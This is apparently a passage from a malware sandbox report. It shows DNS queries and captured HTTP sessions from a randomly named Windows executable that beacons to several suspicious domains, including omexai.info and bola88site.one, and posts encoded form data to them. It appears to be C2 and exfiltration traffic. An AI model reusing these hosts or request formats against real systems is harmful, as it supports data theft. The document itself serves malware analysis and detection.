Sep 25, 2024 11:36:43.736401081 CEST | 1.1.1.1 | 192.168.2.7 | 0xc06e | Name error (3) | www.woshop.online | none | none | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:36:49.358283997 CEST | 1.1.1.1 | 192.168.2.7 | 0xe44e | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:36:54.834338903 CEST | 1.1.1.1 | 192.168.2.7 | 0xcce3 | No error (0) | www.elsupertodo.net | | 148.72.152.174 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:16.113395929 CEST | 1.1.1.1 | 192.168.2.7 | 0xdc3b | No error (0) | www.omexai.info | omexai.info | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:37:16.113395929 CEST | 1.1.1.1 | 192.168.2.7 | 0xdc3b | No error (0) | omexai.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:16.113395929 CEST | 1.1.1.1 | 192.168.2.7 | 0xdc3b | No error (0) | omexai.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:29.640199900 CEST | 1.1.1.1 | 192.168.2.7 | 0xe7b4 | No error (0) | www.tekilla.wtf | redirect.3dns.box | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:37:29.640199900 CEST | 1.1.1.1 | 192.168.2.7 | 0xe7b4 | No error (0) | redirect.3dns.box | | 172.191.244.62 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:43.146205902 CEST | 1.1.1.1 | 192.168.2.7 | 0xa65c | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:37:43.146205902 CEST | 1.1.1.1 | 192.168.2.7 | 0xa65c | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:37:56.940445900 CEST | 1.1.1.1 | 192.168.2.7 | 0x8675 | No error (0) | www.languagemodel.pro | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:37:56.940445900 CEST | 1.1.1.1 | 192.168.2.7 | 0x8675 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:10.975204945 CEST | 1.1.1.1 | 192.168.2.7 | 0x1b03 | No error (0) | www.kexweb.top | | 63.250.47.40 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:24.270351887 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a61 | No error (0) | www.jobworklanka.online | jobworklanka.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:38:24.270351887 CEST | 1.1.1.1 | 192.168.2.7 | 0x6a61 | No error (0) | jobworklanka.online | | 91.184.0.200 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:37.666352034 CEST | 1.1.1.1 | 192.168.2.7 | 0x6edc | No error (0) | www.dyme.tech | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:37.666352034 CEST | 1.1.1.1 | 192.168.2.7 | 0x6edc | No error (0) | www.dyme.tech | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 11:38:51.176611900 CEST | 1.1.1.1 | 192.168.2.7 | 0xe66f | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 11:39:05.226440907 CEST | 1.1.1.1 | 192.168.2.7 | 0x7904 | No error (0) | www.mizuquan.top | | 43.242.202.169 | A (IP address) | IN (0x0001) | false
• www.elsupertodo.net
• www.omexai.info
• www.tekilla.wtf
• www.bola88site.one
• www.languagemodel.pro
• www.kexweb.top
• www.jobworklanka.online
• www.dyme.tech
• www.mizuquan.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 52103 | 148.72.152.174 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:36:54.884459972 CEST | 573 | OUT | GET /2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.elsupertodo.net
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 25, 2024 11:36:55.380481958 CEST | 556 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 25 Sep 2024 09:36:55 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 52104 | 3.33.130.190 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:16.133428097 CEST | 823 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: 7lpPGx=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 52105 | 3.33.130.190 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:18.671310902 CEST | 843 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: 7lpPGx=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612dbYMyOlut2Tf9udNr0hCChzx6YwN3Y+aFJOp4tU6d+mPEgF8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 52106 | 3.33.130.190 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:21.218815088 CEST | 1856 | OUT | POST /7xi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Origin: http://www.omexai.info
Content-Type: application/x-www-form-urlencoded
Content-Length: 1251
Connection: close
Cache-Control: max-age=0
Referer: http://www.omexai.info/7xi5/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 52107 | 3.33.130.190 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:23.761811018 CEST | 569 | OUT | GET /7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.omexai.info
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 25, 2024 11:37:24.230459929 CEST | 419 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Sep 2024 09:37:24 GMT
Content-Type: text/html
Content-Length: 279
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 52108 | 172.191.244.62 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:29.659002066 CEST | 823 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: 7lpPGx=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaSANYF6EpN2vlnMUjR7SBHVCgMgmz041UubUmOXMlu/PfEC16g==
Sep 25, 2024 11:37:30.189925909 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Wed, 25 Sep 2024 09:37:30 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 52109 | 172.191.244.62 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:32.202111959 CEST | 843 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: 7lpPGx=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWt5kOEQkSlAWvfMrsjt6ZalSWjxsfKRhgtEXWFD/NXPVK8ViMw=
Sep 25, 2024 11:37:32.652033091 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Wed, 25 Sep 2024 09:37:32 GMT
Content-Length: 19
Connection: close
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 52110 | 172.191.244.62 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 11:37:34.750504017 CEST | 1856 | OUT | POST /fpzw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.tekilla.wtf
Origin: http://www.tekilla.wtf
Content-Type: application/x-www-form-urlencoded
Content-Length: 1251
Connection: close
Cache-Control: max-age=0
Referer: http://www.tekilla.wtf/fpzw/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 25, 2024 11:37:35.206567049 CEST | 195 | IN | HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Wed, 25 Sep 2024 09:37:35 GMT
Content-Length: 19
Connection: close
                                              Data Ascii: 404 page not found


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.7 | 52111 | 172.191.244.62 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:37.293060064 CEST | 569 | OUT | GET /fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.tekilla.wtf
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:37:37.743155003 CEST | 195 | IN | HTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Wed, 25 Sep 2024 09:37:37 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.7 | 52112 | 172.96.191.39 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:43.167974949 CEST | 832 | OUT | POST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 59 52 51 59 55 77 50 69 65 4a 2b 36 55 53 66 51 79 70 69 67 67 4c 4b 41 4a 31 36 67 36 65 59 42 44 77 32 77 71 39 6d 72 68 55 55 73 57 59 45 73 77 3d 3d
                                              Data Ascii: 7lpPGx=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUYRQYUwPieJ+6USfQypiggLKAJ16g6eYBDw2wq9mrhUUsWYEsw==
                                              Sep 25, 2024 11:37:44.122807026 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:43 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.7 | 52113 | 172.96.191.39 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:45.725790977 CEST | 852 | OUT | POST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 7a 78 45 4c 52 4d 33 63 44 74 44 43 30 75 39 49 4a 48 30 57 78 2b 68 45 35 41 36 45 50 47 37 4a 48 31 57 6e 52 72 6b 71 34 31 71 41 4c 4c 6c 64 41 3d
                                              Data Ascii: 7lpPGx=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzxELRM3cDtDC0u9IJH0Wx+hE5A6EPG7JH1WnRrkq41qALLldA=
                                              Sep 25, 2024 11:37:46.660654068 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Wed, 25 Sep 2024 09:37:46 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.7 | 52114 | 172.96.191.39 | 80 | 4052 | C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 11:37:48.267643929 CEST | 1865 | OUT | POST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
